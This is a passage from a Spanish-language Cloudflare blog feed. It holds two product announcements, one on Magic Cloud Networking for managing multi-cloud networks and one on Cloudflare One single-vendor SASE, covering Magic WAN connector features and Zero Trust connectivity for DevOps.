    <p>Piensa en un sistema ferroviario. Para funcionar eficazmente, necesita tres capas clave:</p><ul><li><p>Vías y trenes</p></li><li><p>Señales electrónicas</p></li><li><p>Una empresa para gestionar el sistema y vender entradas</p></li></ul><p>Un sistema ferroviario con buenas vías, trenes y señalizaciones podría seguir funcionando por debajo de su pleno potencial porque sus agentes son incapaces de seguir el ritmo de la demanda de pasajeros. El resultado es que los pasajeros no pueden planear itinerarios ni comprar billetes.</p><p>La empresa ferroviaria elimina los cuellos de botella en el flujo de procesos simplificando los horarios y los precios, dotando a los agentes de mejores sistemas de reserva e instalando máquinas expendedoras de billetes automatizadas. Ahora se puede aprovechar al máximo la misma infraestructura rápida y fiable de vías, trenes y señalizaciones.</p>
    <div>
      <h3>Resuelve el problema adecuado</h3>
      <a href="#resuelve-el-problema-adecuado">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/342dyvSqIvF0hJJoCDyf0I/8e92b93f922412344fa34cbbea7a4be1/image8.png" />
            
            </figure><p>En las redes, existe un conjunto análogo de tres capas, denominadas <a href="https://www.cloudflare.com/learning/network-layer/what-is-the-control-plane/">planos de red</a>:</p><ul><li><p><b>Plano de datos:</b> las rutas de red que transportan datos (en forma de paquetes) desde el origen al destino.</p></li><li><p><b>Plano de control:</b> los protocolos y la lógica que modifican la forma de dirigir el paquete en el plano de datos.</p></li><li><p><b>Plano de gestión:</b> las interfaces de configuración y la supervisión del plano de datos y del plano de control.</p></li></ul><p>En las redes de nube pública, estas capas se relacionan con:</p><ul><li><p><b>Plano de datos en la nube:</b> las instalaciones y los dispositivos se exponen a los usuarios como servicios de <a href="https://www.cloudflare.com/learning/cloud/what-is-a-virtual-private-cloud/">nube privada virtual (VPC)</a> o red virtual (VNet) que incluyen subredes, tablas inteligentes, grupos de seguridad/lista de control de acceso y servicios adicionales como equilibradores de carga y puertas de enlace VPN.</p></li><li><p><b>Plano de control en la nube:</b> en lugar de protocolos distribuidos, el plano de control en la nube es una <a href="https://www.cloudflare.com/learning/network-layer/what-is-sdn/">red definida por software (SDN)</a> que, por ejemplo, programa tablas de rutas estáticas. (El uso de los protocolos del plano de control tradicional, como el protocolo BGP para comunicarse con redes externas, y el protocolo ARP para comunicarse con máquinas virtuales es limitado).</p></li><li><p><b>Plano de gestión en la nube:</b> una interfaz administrativa con una IU y una API que permite al administrador configurar completamente los planos de datos y control. También proporciona diversas funciones de supervisión y registro que se pueden activar e integrar con sistemas de terceros.</p></li></ul><p>Como en nuestro ejemplo del tren, la mayoría de los problemas que experimentan nuestros clientes con las redes en la nube se encuentran en la tercera capa: el plano de gestión.</p><p>Nefeli simplifica, unifica y automatiza la gestión y las operaciones de la red en la nube.</p>
    <div>
      <h3>Evita costes y complejidad</h3>
      <a href="#evita-costes-y-complejidad">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/nb9xcqGaRRaYIe0lvlbIs/83da6094ec1f7bc3e4a7d72a17fc511c/image2-6.png" />
            
            </figure><p>Un enfoque común para abordar los problemas de gestión en las redes en la nube es incorporar funciones de red virtual (VNF), que son <a href="https://www.cloudflare.com/learning/cloud/what-is-a-virtual-machine/">máquinas virtuales (VM)</a> que reenvían los paquetes para reemplazar los desarrollos nativos del plano de datos en la nube. Algunas VNF son enrutadores, firewalls o equilibradores de carga que se han transferido desde los dispositivos de hardware de un proveedor de redes tradicional, mientras que otras son proxies basados en software, a menudo desarrollados sobre proyectos de código abierto como NGINX o Envoy. Como las VNF imitan a sus homólogas físicas, los equipos informáticos podrían seguir utilizando herramientas de gestión conocidas. Sin embargo, las VNF tienen desventajas:</p><ul><li><p>Las máquinas virtuales no tienen hardware de red personalizado, por lo que dependen de la potencia de procesamiento bruta. La máquina virtual se dimensiona para el pico de carga previsto y suele funcionar de forma interrumpida (24/7). Esto conlleva un elevado coste de procesamiento, independientemente de la utilización real.</p></li><li><p>La alta disponibilidad depende de una configuración de red frágil, costosa y compleja.</p></li><li><p>La incorporación de servicios, la configuración para poner una VNF en el flujo del paquete, a menudo impone rutas de paquete que incurren en cargos adicionales por ancho de banda.</p></li><li><p>Las VNF suelen tener una licencia similar a la de sus homólogas locales y son caras.</p></li><li><p>Las VNF imponen una compatibilidad obligada a las empresas y potencialmente las excluyen de beneficiarse de las mejoras en las soluciones de plano de datos en la nube.</p></li></ul><p>Por estas razones, las empresas se están alejando de las soluciones basadas en VNF y buscan cada vez más confiar en las capacidades de red nativas de sus proveedores de servicios en la nube. La red integrada en la nube pública es flexible, eficaz, sólida y tiene un precio por uso, con opciones de alta disponibilidad integradas y respaldadas por el acuerdo de nivel de servicio del proveedor de la nube.</p><p>En nuestro ejemplo del tren, las vías y los trenes son adecuados. Asimismo, el plano de datos de la red en la nube dispone de una alta capacidad. El cambio del plano de datos para resolver los problemas del plano de gestión es un enfoque equivocado. Para que esto funcione a escala, las organizaciones necesitan una solución que trabaje junto con las capacidades de red nativas de los proveedores de servicios en la nube.</p><p>Nefeli aprovecha los desarrollos nativos del plano de datos de la nube en lugar de VNF de terceros.</p>
    <div>
      <h2>Magic Cloud Networking</h2>
      <a href="#magic-cloud-networking">
        
      </a>
    </div>
    <p>El equipo de Nefeli se ha unido a Cloudflare para integrar la funcionalidad de gestión de redes en la nube con Cloudflare One. Esta capacidad se denomina Magic Cloud Networking y con ella las empresas pueden utilizar el panel de control y la API de Cloudflare para gestionar sus redes en nubes públicas y conectarse con Cloudflare One.</p>
    <div>
      <h3>De un extremo a otro</h3>
      <a href="#de-un-extremo-a-otro">
        
      </a>
    </div>
    <p>Al igual que los proveedores de trenes se centran solo en completar los trayectos en su propia red, los proveedores de servicios en la nube ofrecen conectividad de red y herramientas dentro de una única cuenta en la nube. Muchas grandes empresas tienen cientos de cuentas en varios proveedores nube. En una red integral, esto crea silos de red inconexos que plantean riesgos y llevan aparejadas ineficiencias operativas.</p><p>Imagina que estás intentando organizar un viaje en tren por Europa, y ninguna compañía ferroviaria presta servicio tanto en tu origen como en tu destino. Sabes que todos ofrecen el mismo servicio básico: un asiento en un tren. Sin embargo, la organización de tu viaje es difícil porque implica numerosos trenes operados por diferentes compañías con sus propios horarios y tarifas de billetes, ¡y todo ello en diferentes idiomas!</p><p>Magic Cloud Networking es como una agencia de viajes en línea que combina numerosas opciones de transporte, ofrece la capacidad de reservar numerosos billetes, facilita los cambios después de la reserva y, además, ofrece actualizaciones del estado del viaje.</p><p>A través del panel de control de Cloudflare, puedes descubrir todos tus recursos de red en cuentas y proveedores de nube y visualizar tu red integral en una única interfaz. Una vez que Magic Cloud Networking identifica tus redes, puedes desarrollar una red escalable mediante un flujo de trabajo sencillo y totalmente automatizado.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4P7EhpKlEfTnU7WdPq4dt6/4de908c385b406a89c97f4dc274b3acb/image6.png" />
            
            </figure><p><i>El inventario de recursos muestra toda la configuración en una interfaz de usuario única y receptiva</i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2qXuFK0Q1q96NtH0FYRNg0/3c449510b24a3f206b63b01e1799dddd/image3-8.png" />
            
            </figure>
    <div>
      <h3>Resuelve la complejidad por nube</h3>
      <a href="#resuelve-la-complejidad-por-nube">
        
      </a>
    </div>
    <p>Las nubes públicas se utilizan para ofrecer aplicaciones y servicios. Cada proveedor de nube ofrece una pila componible de bloques de creación modulares (recursos) que empiezan con la base de una cuenta de facturación y luego añaden controles de seguridad. La siguiente capa fundamental, para aplicaciones basadas en el servidor, es la red VPC. Se desarrollan recursos adicionales sobre la base de red de la VPC hasta que dispongas de infraestructura informática, de almacenamiento y de red para alojar la aplicación y los datos de la empresa. Incluso las arquitecturas relativamente sencillas pueden estar compuestas por cientos de recursos.</p><p>El problema es que estos recursos exponen abstracciones que son diferentes de los bloques de creación que utilizarías para desarrollar un servicio localmente. Las abstracciones difieren entre los proveedores de nube, y forman un web de dependencias con reglas complejas sobre cómo se realizan los cambios de configuración (reglas que difieren entre los tipos de recursos y los proveedores de nube). Por ejemplo, supongamos que creo 100 máquinas virtuales y las conecto a una red que utiliza una dirección IP. ¿Puedo hacer cambios en la dirección IP de la red mientras las máquinas virtuales están utilizando la red? Depende.</p><p>Magic Cloud Networking gestiona estas diferencias y complejidades por ti. Configura creaciones nativas de nube como puertas de enlace VPN, rutas y grupos de seguridad para conectar de forma segura tu red VPC en la nube a Cloudflare One sin tener que aprender las fórmulas de cada nube para crear hubs y conexiones VPN.</p>
    <div>
      <h3>Automatización continua y coordinada</h3>
      <a href="#automatizacion-continua-y-coordinada">
        
      </a>
    </div>
    <p>Volviendo a nuestro ejemplo del sistema ferroviario, ¿qué ocurre si el personal de mantenimiento del ferrocarril encuentra un fallo peligroso en la vía férrea? Colocan manualmente la señal de parada para evitar que los trenes que vienen en dirección contraria utilicen el tramo de vía defectuoso. Entonces, ¿qué pasa si, por una desafortunada coincidencia, la oficina de programación cambia el horario de las señales, y las configuran a distancia, lo que anula la medida de seguridad adoptada por el equipo de mantenimiento? Ahora hay un problema que nadie conoce y la raíz del problema es que varias autoridades pueden cambiar las señales a través de diferentes interfaces sin coordinación.</p><p>El mismo problema existe en las redes en la nube. Los cambios de configuración son realizados por diferentes equipos que utilizan diferentes interfaces de automatización y configuración en un abanico de funciones como facturación, soporte, seguridad, redes, firewalls, base de datos y desarrollo de aplicaciones.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/VNaeoX2TNwYwZsweytYSZ/40806d02108119204f638ed5f111d5d0/image1-10.png" />
            
            </figure><p>Una vez implementada tu red, Magic Cloud Networking supervisa su configuración y estado, permitiéndote confiar en que la seguridad y la conectividad que pusiste en marcha ayer siguen vigentes hoy. Monitorea los recursos en la nube de los que es responsable, revirtiendo automáticamente el desfase si se modifican fuera de banda, al tiempo que te permite gestionar otros recursos, como buckets de almacenamiento y servidores de aplicación, con otras herramientas de automatización. Y, si cambias de red, Cloudflare se encarga de la gestión de rutas, incorporando y retirando rutas globalmente a través de Cloudflare y de todas las redes de proveedores de nube conectadas.</p><p>Magic Cloud Networking es totalmente programable mediante API, y se puede integrar en el conjunto de herramientas de automatización existentes.</p><p><i>La interfaz avisa cuando la infraestructura de red de la nube se aleja del propósito</i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3h360ewBWWCRUjhqjrm6wF/5006f8267a880b98ccbe9bfc91cb9029/image7-1.png" />
            
            </figure>
    <div>
      <h2>¿Estás listo para empezar a controlar las redes en la nube?</h2>
      <a href="#estas-listo-para-empezar-a-controlar-las-redes-en-la-nube">
        
      </a>
    </div>
    <p>Estamos encantados de anunciar la incorporación de Magic Cloud Networking como otro paso fundamental para cumplir la promesa de la <a href="https://www.cloudflare.com/connectivity-cloud/">conectividad cloud</a>. Esta solución es el primer paso para permitir a los clientes integrar Cloudflare de manera eficaz con su nube pública de manera que puedan conectarse y permanecer conectados de forma segura, y beneficiarse de la flexibilidad y el ahorro de costes sobre la marcha.</p><p>Únete a nosotros en este recorrido y consigue acceso anticipado. Obtén más información y regístrate hoy mismo <a href="https://cloudflare.com/lp/cloud-networking/">aquí</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/610Vl5u7JVsnszRAmQz0Yt/3bb2a75f47826c1c1969c1d9b0c1db8d/image4-10.png" />
            
            </figure> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Network]]></category>
            <category><![CDATA[AWS]]></category>
            <category><![CDATA[EC2 (ES)]]></category>
            <category><![CDATA[Google Cloud]]></category>
            <category><![CDATA[Microsoft Azure (ES)]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Multi-Cloud (ES)]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[Magic WAN]]></category>
            <category><![CDATA[Conectividad cloud]]></category>
            <category><![CDATA[Acquisitions]]></category>
            <guid isPermaLink="false">2qMDjBOoY9rSrSaeNzUDzL</guid>
            <dc:creator>Steve Welham</dc:creator>
            <dc:creator>David Naylor</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cumple la promesa del enfoque SASE de un solo proveedor mediante la modernización de la red]]></title>
            <link>https://blog.cloudflare.com/es-es/single-vendor-sase-announcement-2024/</link>
            <pubDate>Wed, 07 Feb 2024 14:00:55 GMT</pubDate>
            <description><![CDATA[ Una solución SASE de proveedor único simplifica la seguridad, las redes y los flujos de trabajo de DevOps — ahora con funciones ampliadas de conectividad de red de sitio a sitio, WANaaS, de malla y punto a punto ]]></description>
            <content:encoded><![CDATA[ <p>Conforme más organizaciones avanzan de manera colectiva hacia la adopción de una arquitectura <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/">SASE</a>, no hay duda de que la definición tradicional del mercado SASE (<a href="https://www.cloudflare.com/learning/access-management/security-service-edge-sse/">SSE</a> + <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-sd-wan/">SD-WAN</a>) no es suficiente. Este enfoque obliga a algunos equipos a trabajar con numerosos proveedores para abordar sus necesidades específicas, lo que plantea inconvenientes en términos de rendimiento y seguridad. Y lo que es más preocupante, ese modelo se basa más en una lista de servicios que en la arquitectura subyacente de un proveedor. Incluso los servicios de seguridad individuales más avanzados o los accesos de tráfico pierden importancia si, en última instancia, las organizaciones envían su tráfico a través de una red fragmentada y deficiente.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1mOcjLGteDYQYsMp32AjAy/d7b797f902795cc3fbfe6aa19fb989ee/Single-vendor-SASE-simplified-for-security--networking--and-DevOps-1.png" />
            
            </figure><p>La arquitectura SASE de proveedor único es una tendencia crítica para combinar tecnologías de seguridad y de red dispares, pero la "conectividad universal" de las empresas necesita una verdadera modernización de la red para que el modelo SASE funcione para todos los equipos. En los <a href="/introducing-cloudflare-one">últimos años</a>, Cloudflare ha lanzado capacidades para ayudar a las organizaciones a modernizar sus redes mientras avanzan en sus hojas de ruta a corto y largo plazo de casos de uso de SASE. Hemos ayudado a simplificar la implementación de SASE, independientemente del equipo que lidere la iniciativa.</p>
    <div>
      <h2>Anunciamos accesos flexibles (¡aún más!) para plataformas SASE de proveedor único</h2>
      <a href="#anunciamos-accesos-flexibles-aun-mas-para-plataformas-sase-de-proveedor-unico">
        
      </a>
    </div>
    <p>Hoy anunciamos una serie de actualizaciones de nuestra plataforma SASE, <a href="https://www.cloudflare.com/zero-trust/">Cloudflare One</a>, que amplían la promesa de una arquitectura SASE de proveedor único. A través de estas nuevas capacidades, Cloudflare aumenta la flexibilidad y la accesibilidad de las redes SASE para los equipos de seguridad, mejora la eficiencia para los equipos de redes tradicionales, y amplía de forma única su alcance a los equipos técnicos que apenas tienen acceso a las conversaciones sobre conectividad SASE: los equipos de DevOps.</p><p>Estas actualizaciones de la plataforma incluyen:</p><ul><li><p>Accesos flexibles para la conexión de sitio a sitio que permiten implementaciones basadas tanto en agentes/proxy como en dispositivos/servicios de enrutamiento, y simplifican la conectividad SASE tanto para los equipos de seguridad como para los de redes.</p></li><li><p>Nuevas capacidades de WAN como servicio (WANaaS), tales como alta disponibilidad, conocimiento de las aplicaciones, opciones de implementación de máquinas virtuales, y visibilidad y análisis mejorados que aumentan la eficiencia operativa al tiempo que reducen los costes de red mediante un enfoque de "sucursal ligera, nube pesada".</p></li><li><p>Conectividad <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> para DevOps: capacidades de redes seguras de malla y punto a punto que amplían <a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/">ZTNA</a> para admitir flujos de trabajo de servicio a servicio y tráfico bidireccional.</p></li></ul><p>Cloudflare ofrece una amplia gama de accesos directos y de salida SASE, incluidos conectores para tu WAN, aplicaciones, servicios, sistemas, dispositivos o cualquier otro recurso de red interno, para enrutar más fácilmente el tráfico hacia y desde los servicios de Cloudflare. Esta ventaja ayuda a las organizaciones a alinearse con su paradigma de conectividad más adecuado, en función del entorno existente, la familiaridad técnica y la función laboral.</p><p>Recientemente hemos hablado sobre el <a href="/magic-wan-connector-general-availability/">conector Magic WAN</a> en otra entrada del blog y hemos explicado cómo se interrelacionan todos nuestros accesos en nuestra <a href="https://developers.cloudflare.com/reference-architecture/architectures/sase/">arquitectura de referencia SASE</a>, incluido nuestro nuevo <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/private-net/warp-connector/">WARP Connector</a>. Este blog se centra en el impacto significativo que esas tecnologías tienen para los clientes que abordan las redes SASE desde puntos de vista diferentes.</p>
    <div>
      <h2>Más flexible y accesible para los equipos de seguridad</h2>
      <a href="#mas-flexible-y-accesible-para-los-equipos-de-seguridad">
        
      </a>
    </div>
    <p>El proceso de implementación de una arquitectura SASE puede desafiar el <i>statu quo</i> de una organización en cuanto a responsabilidades internas y colaboración entre los equipos informáticos, de seguridad y de redes. Diferentes equipos poseen diversas tecnologías de seguridad o redes cuyos ciclos de sustitución no están necesariamente alineados, lo que puede reducir la disposición de la organización para promover proyectos concretos.</p><p>Los profesionales de seguridad o de informática necesitan poder proteger los recursos independientemente de dónde se alojen. A veces, un pequeño cambio en la conectividad les ayudaría a proteger más eficazmente un determinado recurso, pero la tarea está fuera de su ámbito de control. Los equipos de seguridad no quieren tener que depender de sus equipos de redes para hacer su trabajo, y sin embargo tampoco necesitan causar problemas descendentes con la infraestructura de red existente. Necesitan una forma más fácil de conectar subredes, por ejemplo, sin que la burocracia se lo impida.</p>
    <div>
      <h3>Conectividad de sitio a sitio basada en agente/proxy</h3>
      <a href="#conectividad-de-sitio-a-sitio-basada-en-agente-proxy">
        
      </a>
    </div>
    <p>Para ayudar a que estos proyectos basados en la seguridad superen los retos asociados a los silos tradicionales, Cloudflare ofrece implementaciones basadas tanto en agentes/proxy como en dispositivos/servicios de enrutamiento para la conectividad de sitio a sitio o de subred a subred. De este modo, los equipos de redes pueden seguir los conceptos de redes tradicionales con los que están familiarizados a través de nuestra WANaaS basada en dispositivos/servicios de enrutamiento — una arquitectura moderna frente a las superposiciones SD-WAN heredadas. Al mismo tiempo, los equipos de seguridad/informática pueden conseguir conectividad a través de conectores de software basados en agentes/proxy (como <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/private-net/warp-connector/">WARP Connector</a>) cuya implementación puede ser más fácil. Este enfoque basado en agentes diluye la separación entre las normas del sector para los conectores de las filiales y los conectores de aplicación, acercando la tecnología WAN y ZTNA para ayudar a conseguir el acceso con menos privilegios en todas partes.</p><p>La conectividad basada en agente/proxy puede ser un ajuste complementario para un subconjunto de la conectividad de red total de una organización. Estos casos de uso de sitio a sitios, basados en software, podrían incluir micrositios sin enrutadores ni firewalls, o quizá casos en los que los equipos no pueden configurar túneles <a href="https://www.cloudflare.com/learning/network-layer/what-is-ipsec/">IPsec</a> o GRE, como en redes gestionadas muy reguladas o entornos en la nube como Kubernetes. Las organizaciones pueden combinar accesos de entrada de tráfico que se ajusten a sus necesidades. Todas las opciones se pueden utilizar de forma componible y simultánea.</p><p>Nuestro enfoque basado en agente/proxy para la conectividad de sitio a sitio utiliza la misma tecnología subyacente que ayuda a los equipos de seguridad a sustituir totalmente las VPN, y a admitir ZTNA para aplicaciones con tráfico iniciado por el servidor o bidireccional. Se incluyen servicios como el tráfico VoIP (Voice over Internet Protocol) y SIP (Session Initiation Protocol), System Center Configuration Manager (SCCM) de Microsoft, replicación de dominios de Active Directory (AD) y, como se detalla más adelante en este blog, flujos de trabajo DevOps.</p><p><i>Diagrama que muestra los conectores de software de Cloudflare (accesos) que conectan simultáneamente la sede central, las filiales, los centros de datos, las nubes públicas y los usuarios remotos.</i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1WoJQPnDHFTkHmaoIOSQny/016a189f6f78e6672768d21a32ed0871/Any-to-Any-Diagram---SVSASE-Blog.png" />
            
            </figure><p>Este nuevo acceso de Cloudflare permite la conectividad de red de sitio a sitio, bidireccional y de malla sin necesidad de cambios en la infraestructura de enrutamiento de red subyacente. Actúa como un enrutador para la subred dentro de la red privada para el tráfico de entrada y salida a través de Cloudflare.</p>
    <div>
      <h2>Más eficiente para los equipos de redes</h2>
      <a href="#mas-eficiente-para-los-equipos-de-redes">
        
      </a>
    </div>
    <p>Mientras tanto, para los equipos de redes que prefieren una implementación basada en dispositivos/servicios de enrutamiento de la capa de red para la conectividad de sitio a sitio, las normas del sector siguen obligando a elegir entre seguridad, rendimiento, coste y fiabilidad. Muchas (si no la mayoría) de las grandes empresas siguen confiando en formas heredadas de conectividad privada, como la tecnología <a href="https://www.cloudflare.com/learning/network-layer/what-is-mpls/">MPLS</a>. Este método suele ser caro y poco flexible, pero es muy fiable y tiene funciones como la calidad de servicio que se utilizan para la gestión del ancho de banda.</p><p>La conectividad básica a Internet está ampliamente disponible en la mayor parte del mundo habitado, pero plantea una serie de desafíos que la convierten en un sustituto imperfecto de las redes MPLS. En muchos países, la red Internet de alta velocidad es rápida y barata, pero no siempre es así. La velocidad y los costes dependen de la infraestructura local y del mercado de proveedores de servicios regionales. En general, la conexión a Internet de banda ancha tampoco es tan fiable como las redes MPLS. Las cortes y la lentitud no son inusuales, y los clientes tienen distintos grados de tolerancia a la frecuencia y duración de las interrupciones del servicio. Para las empresas, las interrupciones y la ralentización de la velocidad no son tolerables. Las interrupciones del servicio de red se traducen en pérdidas, clientes insatisfechos, menor productividad y empleados descontentos. Por eso, a pesar de que una parte importante de los flujos de tráfico corporativo se ha desplazado de todos modos a Internet, muchas organizaciones tienen dificultades para migrar de las redes MPLS.</p><p>SD-WAN planteó una alternativa a las redes MPLS que es neutral en cuanto al transporte y mejora la estabilidad de la red respecto a la banda ancha convencional en sí. Sin embargo, conlleva nuevos desafíos en cuanto a la topología y la seguridad. Por ejemplo, muchas implementaciones de SD-WAN pueden aumentar el riesgo si eluden la inspección entre filiales. También presenta desafíos específicos de implementación, como la forma de abordar el escalado y el uso/control (o más exactamente, la falta de) una milla intermedia. Así pues, la promesa de hacer un cambio completo a la conectividad a Internet y eliminar la red MPLS sigue sin cumplirse para muchas organizaciones.  Estas cuestiones tampoco son muy evidentes para algunos clientes en el momento de la compra y requieren formación continua del mercado.</p>
    <div>
      <h3>Evolución de la WAN empresarial</h3>
      <a href="#evolucion-de-la-wan-empresarial">
        
      </a>
    </div>
    <p>Cloudflare <a href="https://developers.cloudflare.com/magic-wan/">Magic WAN</a> sigue un paradigma diferente diseñado desde cero en la <a href="https://www.cloudflare.com/connectivity-cloud/">conectividad cloud</a> de Cloudflare. Adopta un enfoque de "filial ligera, nube pesada" para complementar y, con el tiempo, sustituir las arquitecturas de red existentes, incluidos los circuitos MPLS y las superposiciones SD-WAN. Si bien Magic WAN tiene controles de enrutamiento y configuración nativos de nube, similares a los que los clientes esperarían de una SD-WAN tradicional, su implementación, gestión y uso es más fácil. Se adapta a las necesidades en evolución de las empresas, con seguridad integrada. Clientes como Solocal coinciden en que las ventajas de esta arquitectura mejoran en última instancia su coste total de propiedad:</p><blockquote><p><i>"El conector Magic WAN de Cloudflare ofrece una gestión centralizada y automatizada de la infraestructura de red y seguridad, con un enfoque intuitivo. Como parte de la plataforma SASE de Cloudflare, proporciona una arquitectura de proveedor único coherente y homogénea, basada en los estándares del mercado y las prácticas recomendadas. Se garantiza el control de todos los flujos de datos y se reducen los riesgos de fugas o fallos de seguridad. No tenemos dudas de que debería proporcionarnos ahorros significativos, ya que reduce hasta un 40 % todos los costes relacionados con la adquisición, la instalación, el mantenimiento y la actualización de los dispositivos de nuestra red de filiales. Una solución de conectividad de gran eficacia para que nuestros informáticos modernicen nuestra red".       </i><b><i>- Maxime Lacour, director de operaciones de red Solocal</i></b></p></blockquote><p>Este enfoque es muy diferente a otras soluciones SASE de proveedor único, que han intentado conciliar adquisiciones que se diseñaron en torno a filosofías de diseño básicamente diferentes. Estas soluciones "agrupadas" promueven experiencias incompatibles debido a sus arquitecturas fragmentadas, y no distan mucho de lo que las organizaciones podrían experimentar si trabajaran con numerosos proveedores independientes de todos modos. La consolidación de los componentes de SASE con un proveedor que ha desarrollado una solución unificada e integrada, frente a la combinación de diferentes soluciones para redes y seguridad, simplifica significativamente la implementación y la gestión, porque reduce la complejidad, los riesgos de pasar por alto la seguridad y los posibles problemas de integración o conectividad.</p><p>Magic WAN puede establecer automáticamente túneles IPsec con Cloudflare a través de nuestro conector, bien manualmente a través de túneles IPsec Anycast o GRE iniciados en el enrutador o firewall de perímetro de un cliente, o a través de Cloudflare Network Interconnect (CNI) en ubicaciones de emparejamiento privadas o instancias de nube pública. Trasciende las afirmaciones de "integración" con SSE para converger realmente la seguridad y la funcionalidad de red y ayudar a las organizaciones a modernizar sus redes de forma más eficaz.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3loYghphtdKcxfSOh1RssS/c21b0e50fbfdac2bcd7092f47a38f85e/Magic-WAN-Diagram---SVSASE-Blog.png" />
            
            </figure><p><i>Diagrama que muestra Magic WAN de Cloudflare conectando sucursales, centros de datos y nubes privadas virtuales a servicios de seguridad en la red global de Cloudflare.</i></p>
    <div>
      <h3>Nuevas funciones del conector Magic WAN</h3>
      <a href="#nuevas-funciones-del-conector-magic-wan">
        
      </a>
    </div>
    <p>En octubre de 2023, anunciamos la disponibilidad general del conector Magic WAN, un dispositivo ligero que los clientes pueden colocar en los entornos de red existentes para obtener conectividad sin intervención a Cloudflare One y, en última instancia, utilizar para sustituir otro hardware de red, como dispositivos SD-WAN, enrutadores y firewalls heredados. Hoy nos complace anunciar las nuevas funciones del conector Magic WAN, que incluyen:</p><ul><li><p><b>Configuraciones de alta disponibilidad (HA) para entornos críticos:</b> en las implementaciones empresariales, las organizaciones suelen desear soporte de alta disponibilidad para mitigar el riesgo de fallos de hardware. La alta disponibilidad utiliza un par de conectores Magic WAN (que se ejecutan como una máquina virtual o en un dispositivo de hardware compatible) que funcionan conjuntamente para reanudar el funcionamiento sin problemas si falla un dispositivo. Los clientes pueden gestionar la configuración de alta disponibilidad, como todos los demás aspectos del conector Magic WAN, desde el panel de control unificado Cloudflare One.</p></li><li><p><b>Conocimiento de las aplicaciones:</b> una de las principales funciones diferenciadoras de SD-WAN frente a dispositivos de red más tradicionales ha sido la capacidad de crear políticas de tráfico basadas en aplicaciones conocidas, además de atributos de la capa de red como IP y rangos de puertos. Las políticas basadas en aplicaciones facilitan la gestión y proporcionan más granularidad sobre los flujos de tráfico. La implementación de Cloudflare del conocimiento de las aplicaciones aprovecha la información de nuestra red global, utilizando la misma categorización/clasificación que ya comparten herramientas de seguridad como nuestra puerta de enlace web segura, por lo que los equipos de informática y de seguridad pueden esperar un comportamiento coherente en las decisiones de enrutamiento e inspección, una capacidad que no está disponible en las soluciones SASE agrupadas o de proveedor dual.</p></li><li><p><b>Opción de implementación en máquina virtual:</b> el conector Magic WAN está ahora disponible como imagen de software de dispositivo virtual, que se puede descargar para su implementación inmediata en cualquier plataforma de virtualización/hipervisor compatible. El conector Magic WAN virtual tiene el mismo modelo de implementación ultra sencillo y la misma experiencia de gestión centralizada de flotas que el dispositivo de hardware, y se ofrece a todos los clientes de Magic WAN sin coste adicional.</p></li><li><p><b>Visibilidad y análisis mejorados:</b> el conector Magic WAN ofrece una visibilidad mejorada de métricas clave como el estado de la conectividad, la utilización de la CPU, el consumo de memoria y la temperatura del dispositivo. Estos análisis están disponibles a través del panel de control y la API para que los equipos de operaciones puedan integrar los datos en sus centros de control de red.</p></li></ul>
    <div>
      <h2>Ampliación del alcance de SASE a los equipos de DevOps</h2>
      <a href="#ampliacion-del-alcance-de-sase-a-los-equipos-de-devops">
        
      </a>
    </div>
    <p>La interacción compleja con el canal de integración y distribución continuas (CI/CD) es célebre por su agilidad. Por lo tanto, la conectividad y la seguridad que respaldan estos flujos de trabajo deben estar en consonancia. Los equipos de DevOps a menudo dependen de las <a href="https://www.cloudflare.com/learning/access-management/what-is-a-vpn/">VPN</a> tradicionales para acceder de forma remota a distintas herramientas operativas y de desarrollo. La gestión de las VPN es complicada, además son objeto de explotación con vulnerabilidades de día cero, y utilizan un modelo heredado de conectividad de red en estrella tipo hub-and-spoke que es demasiado lento para los flujos de trabajo modernos.</p><p>De cualquier grupo de empleados, los desarrolladores son especialmente capaces de encontrar soluciones creativas que disminuyan la fricción en sus flujos de trabajo diarios, por lo que todas las medidas de seguridad corporativas deben "funcionar sin más", sin interponerse en su camino. Lo ideal sería que todos los usuarios y servidores de los entornos de compilación, preparación y producción se orquestaran mediante <a href="https://www.cloudflare.com/learning/access-management/what-is-access-control/">controles de acceso centralizados</a> de Zero Trust, independientemente de los componentes y herramientas que se utilicen y de su ubicación. Se debe poder responder a los cambios de política ad hoc, así como al acceso temporal Zero Trust para contratistas o incluso personal de emergencia durante un incidente en un servidor de producción.</p>
    <div>
      <h3>Conectividad Zero Trust para DevOps</h3>
      <a href="#conectividad-zero-trust-para-devops">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ZKS8DznwKSILFDtZB3uqO/9a3dc4cfaf7f63f12812d3286ef837aa/DevOps-Diagram---SVSASE-Blog.png" />
            
